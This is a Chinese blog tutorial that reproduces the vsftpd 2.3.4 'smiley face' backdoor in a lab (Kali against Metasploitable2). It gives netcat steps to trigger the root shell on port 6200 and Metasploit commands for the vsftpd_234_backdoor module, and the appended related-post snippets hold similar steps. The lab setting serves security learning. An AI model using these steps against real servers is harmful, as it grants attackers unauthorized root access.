Ftp笑脸漏洞(VSFTPD 2.3.4)复现(后门漏洞)

已于 2024-05-10 23:22:41 修改
阅读量1k 收藏 14
点赞数 5
分类专栏: Web安全进阶 文章标签: 安全 网络
于 2024-05-10 22:24:53 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_62670778/article/details/138683346
版权

Ftp笑脸漏洞(VSFTPD 2.3.4)复现(后门漏洞)

一、原理

  • vsftpd 是“ very secure FTP daemon ”的缩写,安全性是它的一个最大的特点。 vsftpd是一个 UNIX 类操作系统上运行的服务器的名字,它可以运行在诸如 Linux 、 BSD 、 Solaris 、HP UNIX 等系统上面,是一个完全免费的、开放源代码的 ftp 服务器软件,支持很多其他的FTP 服务器所不支持的特征
  • 笑脸漏洞:这个漏洞是开发者在软件中留下的后门漏洞,当连接带有vsftpd 2.3.4版本的服务器的21端口时,输入用户中带有“:) ”,密码任意,即可运行 vsf_sysutil_extra() :打开服务器的6200端口,并且不需要密码就能从6200端口以管理员身份登入目标服务器。因为输入用户名需要带有:),所以称笑脸漏洞

二、复现准备

  1. 靶机:Metasplotable2-Linux - 192.168.9.147
  2. 攻击机:Kali - 192.168.9.148

三、漏洞复现

  1. 使用nmap扫描靶机的IP地址,可以看到靶机的21端口开放,且使用了VSFTPD,版本为2.3.4
    在这里插入图片描述

  2. 利用netcat,连接靶机的21端口,输入user带有 :) ,pass随便输入
    在这里插入图片描述

  3. nmap扫描端口6200,观察端口打开情况:已经开启
    在这里插入图片描述

  4. nc 连接6200端口,成功以root身份登入
    在这里插入图片描述

四、Metasploit利用脚本复现

  1. 命令行输入msfconsole打开Metasploit
msfconsole

在这里插入图片描述

  1. 搜索vsftpd2.3.4的漏洞脚本
search vsftpd 2.3.4

在这里插入图片描述

  1. 使用 use 命令,使用漏洞脚本
use 0
# 也可以是 use exploit/unix/ftp/vsftpd_234_backdoor

在这里插入图片描述

  1. 查看漏洞主要信息,yes选项是我们需要设置的,RPORT已经设置了,还需要设置RHOSTS
    在这里插入图片描述

  2. 设置目标主机

set rhosts 192.168.9.147

在这里插入图片描述

  1. 攻击
run

在这里插入图片描述

月亮今天也很亮
关注
  • 5
    点赞
  • 14
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
专栏目录
Vsftpd2.3.4环境搭建-漏洞利用(笑脸漏洞
qq_34914659的博客
08-09 3024
一、环境搭建 首先,需要找一个漏洞环境,通过fofa搜索"Vsftpd2.3.4",但是没有找到可以利用的环境,于是搭建环境 安装包在csdn上下载,需要50积分 https://download.csdn.net/download/sinat_32937525/11824028 1.靶机环境是centos7 ,首先解压缩包,并上传到靶机目录 tar -zxvf 压缩包名称 2.进入vsftpd目录,赋予文件权限,之后进行make &&a...
vsftpd2.3.4著名笑脸漏洞复现实战
qq_55961856的博客
06-01 1253
1.vsftpd手工利用 攻击机kali:192.168.182.133 靶机metasploit:192.168.182.128 先ping一下靶机看看靶机是否存活 接着使用nmap对靶机进行信息收集 这里可以看到版本是vsftpd2.3.4 漏洞是存在的 直接ftp连接靶机 用户名:user:) 密码随意即可 这时靶机会开启6200端口 记下来nc或者telnet连接就可以了 最后直接可以获取到root权限了 2.MSF利用 打开终端输入msfconsole 这里也是简单的几步命令就能获得r
ftp2.3.4(笑脸漏洞复现)以及安装过程
shurongyugong的博客
11-23 1147
遇到"/usr/bin/ld: 找不到 -lcap"错误,安装 libcap 库及其开发工具。cp RedHat/vsftpd.pam /etc/pam.d/ftp #PAM 认证。扫描目标ip,查看是否存在漏洞,出现以下这些就代表存在。nmap -script=vuln -p 21 目标IP。#检查依赖关系,这将确保安装了构建和编译工具。进行编译安装,出现以下这些东西,说明安装成功。将local_enable改为YES。将listen改为yes。查看是否启动,出现两个。目录下,并赋予执行权限。
系统安全笑脸漏洞vsftpd2.3.4) Metasploitable2.0的俩种攻击方式
最新发布
xt350488的博客
06-20 430
靶机(Metasploitable2)ip: 192.168.209.135攻击机(kali)ip:192.168.209.130。
VSFTPD2.3.4(笑脸漏洞复现
柠檬i的博客
10-29 1817
vsftpd2.3.4在ftp认证时,如果用户名带有 " :) " ,那么6200端口就会存在一个root权限的shell,可以直接连接。
FTP笑脸漏洞
liangtaiwei的博客
12-13 2119
利用nmap探测漏洞笑脸漏洞 nmap --script=vuln -p 21 192.168.1.133 这就是笑脸漏洞,当FTP认证时,如果用户名中包含:) 则会出发监听6200号端接口的连接的shell 此时用nmap -p 6200 192.168.10.133查看连接情况 进行nc 192.168.10.133连接后 然后连接6200端口 完成漏洞利用 ...
笑脸漏洞复现
m0_64005272的博客
10-21 1444
vsftpd2.3.4中在6200端口存在一个shell,使得任何人都可以连接,并且VSFTPD v2.3.4服务,是以root权限运行的,最终获取到的权限也是root。2.开启metasploitable-linux-2.0.0虚拟机,在Kali上打开一个终端,使用Kali的nmap对靶机进行端口扫描,观察靶机上的服务开放情况。注意:此时靶机的6200端口开启,完成后请勿关闭此终端,保持下图的这个状态,不然6200端口也会关闭。1.查看本机ip,打开Kali主机终端,执行ifconfig。
笑脸漏洞(VSFTP2.3.4)复现
dgjkkhcf的博客
07-24 4892
vsftpd2.3.4中在6200端口存在一个shell,使得任何人都可以进行连接,并且VSFTPD v2.3.4 服务,是以 root 权限运行的,最终获取到的权限也是root
vsftpd 2.3.4 带漏洞版本 可复现
09-26
在分析或研究此漏洞的过程中,"vsftpd-2.3.4-infected"这个文件可能是包含了被该漏洞影响的vsftpd服务的复现环境或者漏洞利用脚本。这样的资源对于安全研究人员理解漏洞机制、开发检测工具和构建防御策略非常有价值...
vsftpd 2.3.4
12-15
Linux 源代码 编译安装vsftpd-2.3.4 提供开源安全可靠的ftp服务系统 文件夹内有详细教程与配套文件 Linux 源代码 编译安装vsftpd-2.3.4的配置 Linux下FTP服务器vsftp配置大全超完整版 Linux下vsFTP配置全方案(限制...
vsftpd FTP Server lsc远程拒绝服务漏洞
07-03
### vsftpd FTP Server "ls.c" 远程拒绝服务漏洞详解 #### 一、漏洞概述 **vsftpd**(Very Secure FTP Daemon)是一款专为UNIX类平台设计的安全FTP服务器软件,因其高度的安全性和稳定性而被广泛部署于各类网络...
网络安全中职组ftp2.3.4脚本vsftpd2.3.4.py
11-19
网络安全中职组ftp2.3.4脚本vsftpd2.3.4.py
网络安全 批量执行vsftpd2.3.4漏洞
04-21
可以批量执行笑脸漏洞,支持多线程
漏洞利用 --- VSFTPD 2.3.4 后门
weixin_62443409的博客
06-09 9265
VSFTPD 2.3.4 的攻击就是通过向21端口发送一个特定字节的序列来触发恶意的vsf_sysutil_extra()函数。一旦成功执行,就会在系统的6200端口打开一个后门,从而进行利用。
VSFTPD2.3.4笑脸漏洞复现
m0_60466340的博客
12-11 847
vsftpd2.3.4版本中有一个后门 ,在检测到用户名带有特殊字符:)时,会自动打开6200端口。 复现过程: 用nmap扫面本网段内的主机,发现有打开21端口,用于传输ftp的主机 探测该主机的ftp服务器版本信息,可以看到该版本是存在笑脸漏洞的版本 用netcat连接该主机的21端口,输入带有:)的用户名,和随便一个password 这时候就是以root的权限登录了,可以通过netcat查看6200端口的用户信息 ...
Vsftpd后门
qq_54713392的博客
05-09 683
Vsftpd后门 打开msf,使用search查找vsftpd模块,使用use调用该模块 连接metasploitable的ip地址,使用set rhost IP地址 使用run执行,生成shell
FTP(匿名登录)未授权访问VSFTPD2.3.4漏洞渗透
热门推荐
weixin_52347768的博客
05-05 1万+
漏洞扫描考察论文
vsftpd 2.3.4 带漏洞版本
06-24
### 回答1: vsftpd 2.3.4 是一个包含漏洞FTP服务器软件。这个漏洞版本的FTP服务器软件可以让攻击者远程攻击FTP服务器,从而访问FTP服务器上的敏感数据。这个漏洞是由于软件中存在的安全缺陷造成的。攻击者可以通过发送特殊数据包来利用这个漏洞,这个过程被称为缓冲区溢出攻击。这种攻击可以让攻击者注入恶意代码到服务器上,从而获取敏感信息或控制FTP服务器。因此,如果您使用vsftpd 2.3.4版本,建议您及时升级到最新版本来避免被攻击。同时,您还可以采取其他措施来保护FTP服务器的安全性,例如加强密码策略,限制FTP服务器的访问权限等等。确保FTP服务器的安全性对于任何类型的组织和个人来说都至关重要,因为FTP服务器承载着有关用户和业务的敏感信息。 ### 回答2: vsftpd是一个非常流行的FTP服务器软件,很多Linux发行版都会默认安装这个软件。然而,早期的版本中存在一个漏洞,即在处理传输过程中的命令时,如果恶意用户发送了一个命令包括 nul 字符(ASCII 0),则可能导致 vsftpd服务程序崩溃,并且这种情况下所创建的进程可以被攻击者所利用。 这个漏洞版本的 vsftpd 2.3.4,如果被攻击者利用,可以很容易地导致系统崩溃或远程执行代码。此外,在攻击者访问操作系统级别之前,不需要进行身份验证,这对服务器来说是非常危险的。 为了解决这个漏洞vsftpd的开发者已经针对这个版本发布了更新。用户应该确保他们的vsftpd版本是最新的,并采取适当的安全措施来保护服务器。最好的方法之一是限制使用vsftpd的用户,使他们只有必要的权限,还可以采用防火墙、IDS等技术来增加服务器安全性。此外,定期检查和升级相关软件也是非常重要的。
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值